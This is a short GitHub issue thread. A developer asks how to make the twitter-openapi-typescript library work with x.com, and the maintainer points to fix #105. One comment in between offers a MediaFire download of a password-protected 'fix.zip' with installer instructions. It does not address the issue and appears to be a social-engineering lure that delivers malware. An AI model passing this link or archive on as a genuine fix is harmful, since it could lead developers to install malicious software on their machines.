### ISSUE TITLE
How to make it support x.com api

### ISSUE THREAD

**Issue by penkzhou** [fa0311/twitter-openapi-typescript#104]
I am make a twitter browser extension and I want to use this api to fetch tweet info. it works on twitter.com, but not on x.com

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fa0311** [comment]
fix #105
